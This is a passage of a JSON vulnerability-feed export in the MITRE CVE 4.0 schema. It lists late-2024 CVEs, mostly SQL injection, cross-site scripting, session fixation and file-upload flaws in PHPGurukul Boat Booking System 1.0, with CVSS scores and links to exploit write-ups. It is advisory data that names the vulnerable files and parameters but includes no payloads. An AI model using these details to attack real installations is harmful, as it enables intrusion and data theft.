with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bamazoo:button_generator:1.0:*:*:*:*:wordpress:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T08:15Z", "lastModifiedDate" : "2024-11-05T17:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10151", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/487facf7-8880-48b3-b1b2-0d09823d3c46/", "name" : "https://wpscan.com/vulnerability/487facf7-8880-48b3-b1b2-0d09823d3c46/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Auto iFrame WordPress plugin before 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:toolstack:auto_iframe:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-01-08T06:15Z", "lastModifiedDate" : "2025-05-14T15:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10152", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b4d17da2-4c47-4fd1-a6bd-6692b07cf710/", "name" : "https://wpscan.com/vulnerability/b4d17da2-4c47-4fd1-a6bd-6692b07cf710/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple Certain Time to Show Content WordPress plugin before 1.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:elementengage:simple_certain_time_to_show_content:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-02-26T13:15Z", "lastModifiedDate" : "2025-05-15T20:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10153", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" }, { "lang" : "en", "value" : "CWE-74" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_book_boat_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_book_boat_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280939", "name" : "VDB-280939 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280939", "name" : "VDB-280939 | PHPGurukul Boat Booking System Book a Boat Page book-boat.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425365", "name" : "Submit #425365 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in PHPGurukul Boat Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file book-boat.php?bid=1 of the component Book a Boat Page. The manipulation of the argument bookingdatefrom/nopeople leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T18:15Z", "lastModifiedDate" : "2025-03-16T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10154", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_status_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_status_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280940", "name" : "VDB-280940 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280940", "name" : "VDB-280940 | PHPGurukul Boat Booking System Check Booking Status Page status.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425385", "name" : "Submit #425385 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Boat Booking System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file status.php of the component Check Booking Status Page. The manipulation of the argument emailid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T19:15Z", "lastModifiedDate" : "2024-10-22T14:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10155", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_book_boat_xss.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_book_boat_xss.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280941", "name" : "VDB-280941 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Mitigation", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280941", "name" : "VDB-280941 | PHPGurukul Boat Booking System Book a Boat Page book-boat.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425397", "name" : "Submit #425397 | PHPGurukul Boat Booking System 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been classified as problematic. This affects an unknown part of the file book-boat.php?bid=1 of the component Book a Boat Page. The manipulation of the argument phone_number leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-19T21:15Z", "lastModifiedDate" : "2024-10-22T14:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10156", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_admin_index_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_admin_index_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280942", "name" : "VDB-280942 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280942", "name" : "VDB-280942 | PHPGurukul Boat Booking System Sign In Page index.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425398", "name" : "Submit #425398 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Sign In Page. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T21:15Z", "lastModifiedDate" : "2024-10-22T14:43Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10157", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" }, { "lang" : "en", "value" : "CWE-74" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_admin_password_recovery_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_admin_password_recovery_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280943", "name" : "VDB-280943 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280943", "name" : "VDB-280943 | PHPGurukul Boat Booking System Reset Your Password Page password-recovery.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425399", "name" : "Submit #425399 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/password-recovery.php of the component Reset Your Password Page. The manipulation of the argument username/mobileno leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T23:15Z", "lastModifiedDate" : "2025-04-03T07:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10158", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-384" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_session_fixation.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280944", "name" : "VDB-280944 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280944", "name" : "VDB-280944 | PHPGurukul Boat Booking System session_start session fixiation", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425414", "name" : "Submit #425414 | PHPGurukul Boat Booking System 1.0 Session Fixiation", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in PHPGurukul Boat Booking System 1.0. Affected is the function session_start. The manipulation leads to session fixiation. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-19T23:15Z", "lastModifiedDate" : "2024-10-22T14:42Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10159", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_profile_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_profile_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280945", "name" : "VDB-280945 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280945", "name" : "VDB-280945 | PHPGurukul Boat Booking System My Profile Page profile.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425434", "name" : "Submit #425434 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in PHPGurukul Boat Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/profile.php of the component My Profile Page. The manipulation of the argument sadminusername/fullname/emailid/mobilenumber leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter \"mobilenumber\" to be affected. But it must be assumed that other parameters are affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T00:15Z", "lastModifiedDate" : "2024-10-22T14:41Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1016", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252286", "name" : "https://vuldb.com/?ctiid.252286", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252286", "name" : "https://vuldb.com/?id.252286", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252286", "name" : "https://vuldb.com/?id.252286", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252286", "name" : "https://vuldb.com/?ctiid.252286", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:flexbyte:solar_ftp_server:2.1.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:flexbyte:solar_ftp_server:2.1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-29T18:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10160", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_bwdates_report_details_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_bwdates_report_details_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280946", "name" : "VDB-280946 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.280946", "name" : "VDB-280946 | PHPGurukul Boat Booking System BW Dates Report Page bwdates-report-details.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.425437", "name" : "Submit #425437 | PHPGurukul Boat Booking System 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in PHPGurukul Boat Booking System 1.0. Affected by this issue is some unknown functionality of the file /admin/bwdates-report-details.php of the component BW Dates Report Page. The manipulation of the argument fdate/tdate leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter \"fdate\" to be affected. But it must be assumed \"tdate\" is affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T00:15Z", "lastModifiedDate" : "2024-10-22T14:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10161", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_change_image_file_upload_rce.md", "name" : "https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_change_image_file_upload_rce.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://phpgurukul.com/", "name" : "https://phpgurukul.com/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://vuldb.com/?ctiid.280947", "name" : "VDB-280947 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280947", "name" : "VDB-280947 | PHPGurukul Boat Booking System Update Boat Image Page change-image.php unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.425440", "name" : "Submit #425440 | PHPGurukul Boat Booking System 1.0 File Upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in PHPGurukul Boat Booking System 1.0. This affects an unknown part of the file change-image.php of the component Update Boat Image Page. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:boat_booking_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-20T01:15Z", "lastModifiedDate" : "2024-10-21T21:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10162", "ASSIGNER" : 